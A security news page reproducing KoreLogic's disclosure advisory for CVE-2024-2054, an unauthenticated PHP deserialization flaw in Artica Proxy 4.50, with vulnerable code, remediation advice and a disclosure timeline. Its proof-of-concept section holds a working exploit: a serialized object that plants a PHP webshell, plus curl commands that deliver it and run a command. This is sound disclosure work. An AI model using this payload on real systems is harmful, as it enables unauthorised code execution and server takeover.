Security
Headlines
HeadlinesLatestCVEs

Headline

Artica Proxy 4.50 Unauthenticated PHP Deserialization

The Artica Proxy administrative web application will deserialize arbitrary PHP objects supplied by unauthenticated users and subsequently enable code execution as the www-data user. Version 4.50 is affected.

Packet Storm
#vulnerability#web#debian#js#php#auth

KL-001-2024-002: Artica Proxy Unauthenticated PHP Deserialization Vulnerability

Title: Artica Proxy Unauthenticated PHP Deserialization Vulnerability
Advisory ID: KL-001-2024-002
Publication Date: 2024.03.05
Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2024-002.txt

  1. Vulnerability Details

    Affected Vendor: Artica
    Affected Product: Artica Proxy
    Affected Version: 4.50
    Platform: Debian 10 LTS
    CWE Classification: CWE-502 Deserialization of Untrusted Data
    CVE ID: CVE-2024-2054

  2. Vulnerability Description

    The Artica Proxy administrative web application will deserialize
    arbitrary PHP objects supplied by unauthenticated users and
    subsequently enable code execution as the “www-data” user.

  3. Technical Description

    Prior to authentication, a user can send an HTTP request
    to the “/wizard/wiz.wizard.progress.php” endpoint. This
    endpoint processes the “build-js” query parameter by base64
    decoding the provided value and then calling the “unserialize”
    PHP function with the decoded value as input.

    Code snippet from "wiz.wizard.progress.php":

     if(isset($_GET["build-js"])){buildjs();exit;}  
     ...  
     $ARRAY=unserialize(base64_decode($_GET["build-js"]));
    

    To exploit this vulnerability, a user can leverage the
    installed “Net_DNS2” library autoloader to instantiate the
    “Net_DNS2_Cache_File” class. The “__destruct” method
    within this class will write to arbitrary files defined
    by the class:

     public function __destruct()  
     {  
         //  
         // if there's no cache file set, then there's nothing to do  
         //  
         if (strlen($this->cache_file) == 0) {  
             return;  
         }
    
         //  
         // open the file for reading/writing  
         //  
         $fp = fopen($this->cache_file, 'a+');  
         if ($fp !== false) {  
         ...  
         if (!is_null($data)) {
    
             //  
             // write the file contents  
             //  
             fwrite($fp, $data);  
         }
    

    An unauthenticated user can overwrite existing files and
    insert a webshell to execute malicious PHP as the “www-data”
    user.

  4. Mitigation and Remediation Recommendation

    No response from vendor. This vulnerability can be remediated
    by deleting the ‘usr/share/artica-postfix/wizard’ directory
    if it is not needed. Otherwise, move it to a location outside
    of the web root.

  5. Credit

    This vulnerability was discovered by Jaggar Henry of KoreLogic,
    Inc.

  6. Disclosure Timeline

    2023.12.18 - KoreLogic requests vulnerability contact and
    secure communication method from Artica.
    2023.12.18 - Artica Support issues automated ticket #1703011342
    promising follow-up from a human.
    2024.01.10 - KoreLogic again requests vulnerability contact and
    secure communication method from Artica.
    2024.01.10 - KoreLogic mail daemon receives SMTP 554 5.7.1 from
    mail.articatech.com with response
    “Client host rejected: Go Away!”
    2024.01.11 - KoreLogic requests vulnerability contact and
    secure communication method via
    https://www.articatech.com/ ‘Contact Us’ web form.
    2024.01.23 - KoreLogic requests CVE from MITRE.
    2024.01.23 - MITRE issues automated ticket #1591692 promising
    follow-up from a human.
    2024.02.01 - 30 business days have elapsed since KoreLogic
    attempted to contact the vendor.
    2024.02.06 - KoreLogic requests update on CVE from MITRE.
    2024.02.15 - KoreLogic requests update on CVE from MITRE.
    2024.02.22 - KoreLogic reaches out to alternate CNA for
    CVE identifiers.
    2024.02.26 - 45 business days have elapsed since KoreLogic
    attempted to contact the vendor.
    2024.02.29 - Vulnerability details presented to AHA!
    (takeonme.org) by proxy.
    2024.03.01 - AHA! issues CVE-2024-2054 to track this
    vulnerability.
    2024.03.05 - KoreLogic public disclosure.

  7. Proof of Concept

    To overwrite the “wiz.upload.php” file to contain a PHP
    webshell, the following serialized object can be base64
    encoded and submitted via the “build-js” query parameter:

O:19:"Net_DNS2_Cache_File":4:{s:10:"cache_file";s:47:"/usr/share/artica-postfix/wizard/wiz.upload.php";s:16:"cache_serializer";s:4:"json";s:10:"cache_size";i:9999999999;s:10:"cache_data";a:1:{s:30:"<?php
system($_GET[‘cmd’]); ?>";a:2:{s:10:"cache_date";i:0;s:3:"ttl";i:9999999999;}}}

    $ ARTICA_URL="https://127.0.0.1:9000"; PAYLOAD_CMD="id"; curl -k   

“$ARTICA_URL/wizard/wiz.wizard.progress.php?build-js=TzoxOToiTmV0X0ROUzJfQ2FjaGVfRmlsZSI6NDp7czoxMDoiY2FjaGVfZmlsZSI7czo0NzoiL3Vzci9zaGFyZS9hcnRpY2EtcG9zdGZpeC93aXphcmQvd2l6LnVwbG9hZC5waHAiO3M6MTY6ImNhY2hlX3NlcmlhbGl6ZXIiO3M6NDoianNvbiI7czoxMDoiY2FjaGVfc2l6ZSI7aTo5OTk5OTk5OTk5O3M6MTA6ImNhY2hlX2RhdGEiO2E6MTp7czozMDoiPD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8%2bIjthOjI6e3M6MTA6ImNhY2hlX2RhdGUiO2k6MDtzOjM6InR0bCI7aTo5OTk5OTk5OTk5O319fQ%3d%3d”
&& curl -k "$ARTICA_URL/wizard/wiz.upload.php?cmd=$PAYLOAD_CMD";

  {"uid=33(www-data) gid=33(www-data) groups=33(www-data)  
   ":{"cache_date":1696883506,"ttl":8303116493}}

The contents of this advisory are copyright© 2024
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:
https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt

Related news

Artica Proxy Unauthenticated PHP Deserialization

A command injection vulnerability in Artica Proxy appliance versions 4.50 and 4.40 allows remote attackers to run arbitrary commands via an unauthenticated HTTP request. The Artica Proxy administrative web application will deserialize arbitrary PHP objects supplied by unauthenticated users and subsequently enable code execution as the www-data user.

Packet Storm: Latest News

CUPS IPP Attributes LAN Remote Code Execution